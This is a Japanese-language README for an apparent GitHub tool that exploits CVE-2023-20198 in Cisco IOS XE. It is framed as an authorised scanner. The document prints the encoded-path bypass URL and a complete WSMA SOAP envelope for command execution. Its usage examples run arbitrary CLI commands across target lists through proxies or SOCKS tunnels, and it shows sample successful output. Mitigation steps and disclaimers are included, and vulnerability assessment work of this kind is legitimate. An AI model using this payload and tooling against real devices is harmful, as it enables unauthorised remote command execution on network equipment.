
Cisco IOS XEデバイスにおけるCVE-2023-20198を検出するためのGoベースの脆弱性スキャナー。リモートコード実行のためにSOAP/XMLインターフェース(WSMA)をテストし、バッチスキャンとHTMLレポート生成機能を備えています。
Cisco IOS XE デバイスにおける CVE-2023-20198 を検出するためのプロフェッショナルな脆弱性スキャナーです。脆弱な SOAP/XML インターフェース (WSMA) をテストします。許可されたセキュリティ評価およびネットワーク監査向けに設計されています。
許可されたセキュリティテストのみに使用
このツールは以下に限定して使用されます:
コンピュータシステムへの不正アクセスは違法です。システムをテストする前に必ず適切な許可を得てください。
go install の使用 (推奨)go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest
バイナリは $GOPATH/bin ディレクトリ (通常は ~/go/bin) にインストールされます。
# リポジトリのクローン
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker
# ビルド
go build -o cisco-cve-2023-20198-checker
# インストール (オプション)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/
# 単一ターゲットのチェック
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# 複数ターゲットのチェック
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin
# HTML レポートの生成
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html
企業環境に最適!以下をサポート:
# HTTP プロキシ
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# SOCKS5 (SSH トンネル)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# 環境変数
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin
詳細なプロキシ設定については PROXY_GUIDE.md を参照してください。
# 基本的な脆弱性チェック
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# カスタムポート
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret
# 特定のコマンドを実行
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# レポート生成
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html
# ターゲットファイルを作成
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF
# 全ターゲットをテスト
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123
# バッチで HTML レポート生成
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html
# ネットワーク情報の列挙
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show ip interface brief"
# バージョン検出
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# HTTP プロキシ経由
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# SOCKS5 プロキシ経由 (SSH トンネル)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# 認証プロキシ
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://user:[email protected]:8080
CVE ID: CVE-2023-20198
CVSS スコア: 10.0 (クリティカル)
タイプ: リモートコード実行 (RCE)
影響を受けるもの: Cisco IOS XE Web UI (WSMA)
/%2577ebui_wsma_https (パスエンコーディングバイパス)urn:cisco:wsma-exec<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP:Header>
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
<wsse:Password>password</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</SOAP:Header>
<SOAP:Body>
<request xmlns="urn:cisco:wsma-exec">
<execCLI>
<cmd>COMMAND_HERE</cmd>
</execCLI>
</request>
</SOAP:Body>
</SOAP:Envelope>
デバイスが脆弱な場合:
1. WSMA を無効にする (不要な場合)
no ip http server
no ip http secure-server
2. ACL でアクセスを制限する
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
permit 10.0.0.0 0.0.0.255
deny any log
3. ファームウェアの更新 - 最新の Cisco セキュリティパッチを適用
4. 強力な認証を有効にする
aaa new-model
aaa authentication login default group tacacs+ local
5. ログの監視 - 不審な SOAP/HTTP アクティビティを確認
# 標準ビルド
go build -o cisco-cve-2023-20198-checker
# 最適化 (より小さいバイナリ)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker
# 異なるプラットフォーム向けクロスコンパイル
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1
╔═══════════════════════════════════════════════════════════╗
║ Cisco SOAP/XML Security Checker ║
║ Educational & Authorized Security Assessment Only ║
╚═══════════════════════════════════════════════════════════╝
[*] Command: show version
[*] Port: 443
[*] Timeout: 10 seconds
[1/1] Testing target: 192.168.1.100:443
[*] Sending SOAP request...
[+] Response received (Status: 200)
[+] Success!
╔═══════════════════════════════════════════════════════════╗
║ BATCH RESULTS ║
╚═══════════════════════════════════════════════════════════╝
[✓] 192.168.1.100:443 - SUCCESS
Cisco IOS XE Software, Version 16.09.04...
╔═══════════════════════════════════════════════════════════╗
║ SUMMARY ║
╚═══════════════════════════════════════════════════════════╝
Total Targets: 1
Successful: 1
Failed: 0
プロフェッショナルなセキュリティ評価レポート:
コントリビューション歓迎!以下の手順でお願いします:
MIT ライセンス - LICENSE ファイルを参照
このツールは許可された脆弱性スキャンのみを目的としています。作成者は誤用について責任を負いません。所有していないシステムをテストする前に、必ず書面による許可を取得してください。
セキュリティコミュニティのために作成されました 🛡️
| フラグ | 型 | デフォルト | 説明 |
|---|
-target | string | - | 単一ターゲットの IP/ホスト名 |
-targets-file | string | - | ターゲットリストファイル (1行1ターゲット) |
-port | int | 443 | HTTPS/SOAP ポート |
-username | string | admin | SOAP ユーザー名 |
-password | string | - | 必須。SOAP パスワード |
-command | string | uname -a | 実行するコマンド |
-html | bool | false | HTML レポートを生成 |
-timeout | int | 10 | リクエストタイムアウト (秒) |
-skip-verify | bool | true | SSL 検証をスキップ |
-proxy | string | - | プロキシ URL (http://, https://, socks5://) |